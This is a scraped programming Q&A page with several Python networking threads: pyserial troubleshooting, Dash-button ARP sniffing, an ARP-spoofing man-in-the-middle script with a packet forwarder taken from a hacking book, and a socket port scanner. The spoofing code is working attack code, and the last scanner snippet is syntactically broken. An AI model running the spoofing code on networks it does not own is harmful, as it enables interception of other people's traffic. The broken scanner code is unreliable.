Develop Reference

Attempting to use pyserial between applications, yet I get terminal

(update)
So I found some documentation on this link
https://elinux.org/RPi_Serial_Connection#Connections_and_signal_levels
If you scroll down you will find a section "S/W: Preventing Linux from using the serial port" It says "By default Linux will grab the serial port and use it as a terminal."
So it appears that this is a thing, however, the instructions it gives is for a Raspberry Pi, and it calls for you to use raspi-config. It doesn't give anything for regular linux use.
Using python I'm attempting to communicate between my laptop and an Up-Board. I'm connecting the Up-board by using an FTDI cable, connected to the serial connection on the board.
(OP)
I've done something similar before with C++ on a different board. The code I'm using I pulled from this site, http://www.varesano.net/blog/fabio/serial%20rs232%20connections%20python
import time
import serial
ser = serial.Serial(
port='/dev/ttyUSB0',
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS
)
print ser.isOpen()
input=1
while 1 :
input = raw_input(">> ")
print "Check"
try:
if input == 'exit':
ser.close()
exit()
else:
ser.write(input + '\r\n')
out = ''
time.sleep(1)
while ser.inWaiting() > 0:
out += ser.read(1)
if out != '':
print ">>" + out
except:
ser.close()
break
I'm doing something similar on the Up-board. The only difference is that it waits for a message, then returns the message back to my laptop. Just a loop back between the Upboard and my laptop.
Here's where it gets interest.
I'm having two seperate issues.
1) I'll attempt to send a word, ie "test" and it will only send "e", "tst" doesn't get sent
2) The other issue is, it sends message, and I get a return for a password. So I reset the software and attempt to connect again, this time I send the username as the first message. I get back a reply for password, then I send the password, and now I have terminal access to the Upboard. While, all I really want is to connect to the application on the other end.
Does anyone have any suggestions on what is going on?

So I found the resolution, it appears that the system was configured in grub to connect to terminal on the same port address.
if you go to /etc/default/grub you will find a line
GRUB_CMDLINE_LINUX="console=ttyS0, 115200n8"
I ended up commenting that line, and I now can connect without it giving me console control.

Detecting Dash button ARP requests

I am having some trouble finding working code to find ARP requests sent out by an Amazon dash button. I tried Ted Benson's code, and also this code here, but neither seem to be working.
Ted's code:
from scapy.all import *
def arp_display(pkt):
if pkt[ARP].op == 1: #who-has (request)
if pkt[ARP].psrc == '0.0.0.0': # ARP Probe
print("ARP Probe from: " + pkt[ARP].hwsrc)
print(sniff(prn=arp_display, filter="arp", store=0, count=10))
The issue I am having is with the line scapy.all import *. I get a long list of explanation, but the last line of the error is
import dnet ImportError: No module named dnet.
The second code I tried is
import socket
import struct
import binascii
# Written by Bob Steinbeiser (https://medium.com/#xtalker)
rawSocket = socket.socket(socket.AF_PACKET, socket.SOCK_RAW,
socket.htons(0x0003))
MAC = '74c24671971c'
while True:
packet = rawSocket.recvfrom(2048)
ethernet_header = packet[0][0:14]
ethernet_detailed = struct.unpack('!6s6s2s', ethernet_header)
arp_header = packet[0][14:42]
arp_detailed = struct.unpack('2s2s1s1s2s6s4s6s4s', arp_header)
# skip non-ARP packets
ethertype = ethernet_detailed[2]
if ethertype != '\x08\x06':
continue
source_mac = binascii.hexlify(arp_detailed[5])
dest_ip = socket.inet_ntoa(arp_detailed[8])
if source_mac == MAC:
print "Dash button pressed!, IP = " + dest_ip
This is the error I am getting: 'AttributeError: 'module' object has no attribute 'AF_PACKET''.
I have tried both code in python 2.7 and 3.4 and it neither work. Please let me know if there is anything I can do, or any code I can re-appropriate.

For the first example, you are probably missing the libdnet dependency, as discussed in this SO answer.
Also, note that a different approach is required to detect newer model Dash buttons (listening for DHCP requests rather than ARP requests). I describe the solution in this answer.

Can't receive reply using PySerial but hyperterminal works

I have a device (Pololu Wixel) that I'm trying to communicate with using a serial connection over USB. Hyperterminal works fine but I'm trying to use Python for more flexibility. I can send commands to the device, but when I try to receive all I get is the command I just sent. However, if I open Hyperterminal, I'll receive the reply there to the command sent from the script. My code is below. I'm at a bit of a loss and it seems like this should be fairly straightforward. I appreciate any help.
import serial
import time
'''
Go through 256 COM ports and try to open them.
'ser' will be the highest port number. Fix this later.
'''
for i in range(256):
currentPort = "COM" + str(i+1)
try:
ser = serial.Serial(currentPort,baudrate=115200,timeout=5)
print("Success!!")
print(ser.name)
except:
pass
print(ser.isOpen())
str = "batt" #Command to request battery levels.
ser.write(str.encode())
x = ser.inWaiting()
print(x)
while ser.inWaiting() > 0:
out = ser.readline()
print(out.decode())

Add a break after finding an active port,
Try passing a different eol value to readline(), "\r" or "\r\n".

Scapy forwarding packages

I'm just learning python with scapy. I read and use the book "Network Hacks - Intensivkurs - Angriff und Verteidigung mit Python" (German).
I would like to try a man in the middle attack by using arp-spoofing.
I have My Computer, the victim (my raspberry pi) and the standard gateway.
To spoofing, i use a code snippet from the book
#!/usr/bin/python
import sys
import time
from scapy.all import sniff, sendp, ARP, Ether
if len(sys.argv) < 3:
print sys.argv[0] + " <target> <spoof_ip>"
sys.exit(0)
iface = "wlan1"
target_ip = sys.argv[1]
fake_ip = sys.argv[2]
ethernet = Ether()
arp = ARP(pdst=target_ip, psrc=fake_ip, op="is-at")
packet = ethernet / arp
while True:
sendp(packet, iface=iface)
time.sleep(10)
It works, my victim shows my mac as gateway.
The victim sends packets with the correct ip but my mac address.
Now the victim should open a website (wget http//example.com) and I want to use Wireshark to read the traffic. But I have to redirect the packages (DNS and TCP/HTTP). I tried it with this code:
#!/etc/usr/python
from scapy.all import *
import sys
iface = "wlan1"
filter = "ip"
VICTIM_IP = "192.168.2.108"
MY_IP = "192.168.2.104"
GATEWAY_IP = "192.168.2.1"
VICTIM_MAC = "### don't want so show###"
MY_MAC = "### don't want so show###"
GATEWAY_MAC = "### don't want so show###"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
packet[Ether].dst = GATEWAY_MAC
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
Wireshark shows a packet with the correct datas (IP Source = Victim IP, IP Destination = Gateway IP, MAC Source = Victim MAC, MAC Destination = Gateway MAC).
The Gateway is a DSL-Router, so also a "DNS-Server".
But my Raspberry doesn't receive a DNS response. What's my fault?
Yours faithfully,
MatStorm

One thing Scapy does not do for you is handle firewall issues; in this situation you would be well served to turn off the host firewall on your attacking host. The packets you're crafting aren't using the usual path for packets.
Also, are you translating the source address when you forward the packets on so that the response comes to you? I don't see that in the code...

Check if monitor mode is on the fake dns server interface. I cannot see from your code if that is done so just a quick tip. I will look closer after some sleep and can see straight. When I did spoofing last time, I had 1 ethernet cable with internet in router and monitor mode on wlan. if I tried without it showed some wanted info but just not right, cant remember for sure what I did to fix it. best of luck.

Python Port Scanner

Am newbie to python and stuck at a point. I want to create port scanner with using only python 3 inbuilt libraries (means avoiding scapy etc) I have following code :
import socket
for i in range(1,26):
s = socket.socket()
s.settimeout(0.5)
ip = "74.207.244.221" #scanme.nmap.org
response = s.connect_ex((ip, i))
if response:
print ("%d\tclose" %i)
else:
print ("%d\topen" %i)
s.close()
Now I want to add 2 functionalities to this : that is
Distinguish between close and filtered ports . In both cases am receiving same errno in return so how can I check if I have received back a rst packet or nothing ? As far as I have tried s.recv() isn't working for this.
I want to control the number of tries (attempts), i.e I want to send only one or two syn packets. I don't want this program to send more than 2 syn packets for probes. How can this thing be achieved ?

Distinguish between close and filtered ports . In both cases am
receiving same errno in return so how can I check if I have received
back a rst packet or nothing
You've probably only checked with servers that send back a RST. Here's what I tried:
First case, normal config:
>>> os.strerror(s.connect_ex((ip, 81)))
'Connection refused'
Second, with manual iptables:
iptables -A OUTPUT -p tcp --dport 81 -j DROP
>>> os.strerror(s.connect_ex((ip, 81)))
'Resource temporarily unavailable'
I want to control the number of tries (attempts), i.e I want to send
only one or two syn packets.
I don't think there's a setsockopt TCP option exposed, but on linux there's:
net.ipv4.tcp_syn_retries
However, since you limited the timeout for the socket, all operations that don't finish within 0.5 seconds will time out. So it's likely only 1 or 2 SYNs will leave the station.

#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socekt.SOCK_STREAM)
host = 74.207.244.221
def portscan(port):
try:
s.connect((host,port))
return True
else:
return False
for x in range(1,255):
if portscan(x):
print('Port',x,'Is Open')